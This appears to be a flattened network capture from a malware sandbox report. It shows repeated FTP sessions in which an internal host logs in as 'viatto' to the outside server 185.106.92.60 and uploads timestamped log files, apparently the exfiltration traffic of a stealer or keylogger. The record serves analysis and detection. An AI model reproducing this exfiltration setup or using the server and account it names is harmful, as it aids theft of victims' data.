                                                                                                                                    Oct 10, 2022 06:03:39.189409018 CEST5001921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:39.212402105 CEST2150019185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:39.212620974 CEST5001921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:39.235799074 CEST2150019185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:39.236310959 CEST5001921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:39.259401083 CEST2150019185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:39.259650946 CEST5001921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:39.283066988 CEST2150019185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:39.286361933 CEST5001921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:39.309462070 CEST2150019185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:39.316168070 CEST5001921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:39.341408968 CEST2150019185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,189)
                                                                                                                                    Oct 10, 2022 06:03:39.365014076 CEST5001921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.40.txt
                                                                                                                                    Oct 10, 2022 06:03:39.397283077 CEST2150019185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:39.423806906 CEST2150019185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:39.611112118 CEST2150021185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:39.611155033 CEST2150021185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:39.611196995 CEST2150021185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:39.617261887 CEST5002121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:39.640618086 CEST2150021185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:39.647624969 CEST5002121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:39.671044111 CEST2150021185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:39.673031092 CEST5002121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:39.696768999 CEST2150021185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:39.697177887 CEST5002121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:39.720844030 CEST2150021185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:39.721446037 CEST5002121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:39.744620085 CEST2150021185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:39.748166084 CEST5002121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:39.771735907 CEST2150021185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,190)
                                                                                                                                    Oct 10, 2022 06:03:39.796684027 CEST5002121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.41.txt
                                                                                                                                    Oct 10, 2022 06:03:39.820732117 CEST2150021185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:39.845333099 CEST2150021185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:40.048643112 CEST2150023185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:40.048672915 CEST2150023185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:40.050406933 CEST2150023185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:40.050635099 CEST5002321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:40.077444077 CEST2150023185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:40.077967882 CEST5002321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:40.102761984 CEST2150023185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:40.103358030 CEST5002321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:40.127418041 CEST2150023185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:40.127662897 CEST5002321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:40.153141975 CEST2150023185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:40.153732061 CEST5002321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:40.178349018 CEST2150023185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:40.184024096 CEST5002321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:40.208903074 CEST2150023185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,192)
                                                                                                                                    Oct 10, 2022 06:03:40.235125065 CEST5002321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.42.txt
                                                                                                                                    Oct 10, 2022 06:03:40.260735989 CEST2150023185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:40.287194967 CEST2150023185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:40.479099035 CEST2150025185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:40.479146957 CEST2150025185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:40.479190111 CEST2150025185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:40.479897022 CEST5002521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:40.505265951 CEST2150025185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:40.507554054 CEST5002521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:40.533387899 CEST2150025185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:40.533653975 CEST5002521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:40.560060024 CEST2150025185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:40.560381889 CEST5002521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:40.589191914 CEST2150025185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:40.589755058 CEST5002521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:40.617695093 CEST2150025185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:40.620448112 CEST5002521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:40.647483110 CEST2150025185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,193)
                                                                                                                                    Oct 10, 2022 06:03:40.671046019 CEST5002521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.43.txt
                                                                                                                                    Oct 10, 2022 06:03:40.700783968 CEST2150025185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:40.727305889 CEST2150025185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:40.989350080 CEST2150027185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:40.989387035 CEST2150027185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:40.989408970 CEST2150027185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:40.989680052 CEST5002721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:41.012355089 CEST2150027185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:41.012778044 CEST5002721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:41.035432100 CEST2150027185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:41.035883904 CEST5002721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:41.082621098 CEST2150027185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:41.082854033 CEST5002721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:41.105869055 CEST2150027185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:41.106782913 CEST5002721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:41.129524946 CEST2150027185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:41.130666971 CEST5002721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:41.153736115 CEST2150027185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,194)
                                                                                                                                    Oct 10, 2022 06:03:41.181493044 CEST5002721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.44.txt
                                                                                                                                    Oct 10, 2022 06:03:41.204688072 CEST2150027185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:41.228382111 CEST2150027185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:41.430238962 CEST2150029185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:41.430741072 CEST2150029185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:41.430857897 CEST2150029185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:41.431171894 CEST5002921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:41.457029104 CEST2150029185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:41.457320929 CEST5002921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:41.482582092 CEST2150029185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:41.483274937 CEST5002921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:41.508594036 CEST2150029185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:41.516199112 CEST5002921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:41.542041063 CEST2150029185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:41.542598009 CEST5002921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:41.566560984 CEST2150029185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:41.568439960 CEST5002921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:41.593552113 CEST2150029185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,195)
                                                                                                                                    Oct 10, 2022 06:03:41.622371912 CEST5002921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.45.txt
                                                                                                                                    Oct 10, 2022 06:03:41.647212029 CEST2150029185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:41.671951056 CEST2150029185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:41.938854933 CEST2150031185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:41.939215899 CEST2150031185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:41.939306021 CEST2150031185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:41.940814972 CEST5003121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:41.964440107 CEST2150031185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:41.964929104 CEST5003121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:41.987793922 CEST2150031185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:41.988303900 CEST5003121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:42.011328936 CEST2150031185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:42.013262987 CEST5003121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:42.037729979 CEST2150031185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:42.042804003 CEST5003121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:42.065877914 CEST2150031185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:42.067172050 CEST5003121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:42.090276003 CEST2150031185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,197)
                                                                                                                                    Oct 10, 2022 06:03:42.118808985 CEST5003121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.46.txt
                                                                                                                                    Oct 10, 2022 06:03:42.141933918 CEST2150031185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:42.166197062 CEST2150031185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:42.360235929 CEST2150033185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:42.360291004 CEST2150033185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:42.360790968 CEST2150033185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:42.366342068 CEST5003321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:42.389632940 CEST2150033185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:42.389942884 CEST5003321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:42.413238049 CEST2150033185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:42.413897991 CEST5003321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:42.437071085 CEST2150033185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:42.441054106 CEST5003321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:42.465167999 CEST2150033185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:42.469255924 CEST5003321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:42.492325068 CEST2150033185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:42.496925116 CEST5003321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:42.520174026 CEST2150033185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,198)
                                                                                                                                    Oct 10, 2022 06:03:42.545715094 CEST5003321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.47.txt
                                                                                                                                    Oct 10, 2022 06:03:42.585825920 CEST2150033185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:42.610086918 CEST2150033185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:42.795295000 CEST2150035185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:42.795350075 CEST2150035185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:42.795382977 CEST2150035185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:42.795777082 CEST5003521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:42.857544899 CEST2150035185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:42.858196020 CEST5003521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:42.882695913 CEST2150035185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:42.883244038 CEST5003521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:42.908833027 CEST2150035185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:42.909254074 CEST5003521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:42.936356068 CEST2150035185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:42.937609911 CEST5003521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:42.964509964 CEST2150035185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:42.965740919 CEST5003521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:42.991337061 CEST2150035185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,199)
                                                                                                                                    Oct 10, 2022 06:03:43.016058922 CEST5003521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.48.txt
                                                                                                                                    Oct 10, 2022 06:03:43.042406082 CEST2150035185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:43.066438913 CEST2150035185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:43.250843048 CEST2150037185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:43.250945091 CEST2150037185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:43.250962019 CEST2150037185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:43.255258083 CEST5003721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:43.279036999 CEST2150037185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:43.279680014 CEST5003721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:43.303489923 CEST2150037185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:43.304137945 CEST5003721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:43.327739000 CEST2150037185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:43.329821110 CEST5003721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:43.353879929 CEST2150037185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:43.354967117 CEST5003721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:43.379487038 CEST2150037185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:43.384838104 CEST5003721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:43.408973932 CEST2150037185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,200)
                                                                                                                                    Oct 10, 2022 06:03:43.433630943 CEST5003721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.49.txt
                                                                                                                                    Oct 10, 2022 06:03:43.458168030 CEST2150037185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:43.482413054 CEST2150037185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:43.669976950 CEST2150039185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:43.670006037 CEST2150039185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:43.670020103 CEST2150039185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:43.673616886 CEST5003921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:43.697352886 CEST2150039185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:43.702301979 CEST5003921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:43.725567102 CEST2150039185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:43.725857973 CEST5003921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:43.749025106 CEST2150039185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:43.749368906 CEST5003921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:43.772742987 CEST2150039185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:43.774812937 CEST5003921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:43.797970057 CEST2150039185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:43.800474882 CEST5003921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:43.824243069 CEST2150039185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,201)
                                                                                                                                    Oct 10, 2022 06:03:43.847887993 CEST5003921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.50.txt
                                                                                                                                    Oct 10, 2022 06:03:43.872170925 CEST2150039185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:43.896610975 CEST2150039185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:44.154128075 CEST2150041185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:44.154159069 CEST2150041185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:44.154177904 CEST2150041185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:44.154489040 CEST5004121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:44.180665016 CEST2150041185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:44.180891037 CEST5004121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:44.208328962 CEST2150041185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:44.211849928 CEST5004121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:44.239948034 CEST2150041185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:44.240253925 CEST5004121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:44.270620108 CEST2150041185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:44.271167040 CEST5004121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:44.298917055 CEST2150041185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:44.301035881 CEST5004121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:44.327404022 CEST2150041185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,203)
                                                                                                                                    Oct 10, 2022 06:03:44.356345892 CEST5004121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.51.txt
                                                                                                                                    Oct 10, 2022 06:03:44.385329962 CEST2150041185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:44.410743952 CEST2150041185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:44.638684988 CEST2150043185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:44.638731003 CEST2150043185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:44.638761997 CEST2150043185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:44.639224052 CEST5004321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:44.665586948 CEST2150043185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:44.666117907 CEST5004321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:44.693191051 CEST2150043185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:44.693491936 CEST5004321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:44.719366074 CEST2150043185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:44.722590923 CEST5004321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:44.748269081 CEST2150043185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:44.749228001 CEST5004321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:44.774207115 CEST2150043185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:44.776813030 CEST5004321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:44.801639080 CEST2150043185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,204)
                                                                                                                                    Oct 10, 2022 06:03:44.827370882 CEST5004321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_08.52.txt
                                                                                                                                    Oct 10, 2022 06:03:44.854540110 CEST2150043185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:44.885628939 CEST2150043185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:45.084119081 CEST2150045185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:45.084616899 CEST2150045185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:45.084719896 CEST2150045185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:45.088680029 CEST5004521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:45.111443996 CEST2150045185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:45.115104914 CEST5004521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:45.137898922 CEST2150045185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:45.138417006 CEST5004521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:45.231483936 CEST2150045185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:45.231915951 CEST5004521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:45.254929066 CEST2150045185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:45.256057978 CEST5004521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:45.278657913 CEST2150045185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:45.280982018 CEST5004521192.168.2.3185.106.92.60PASV
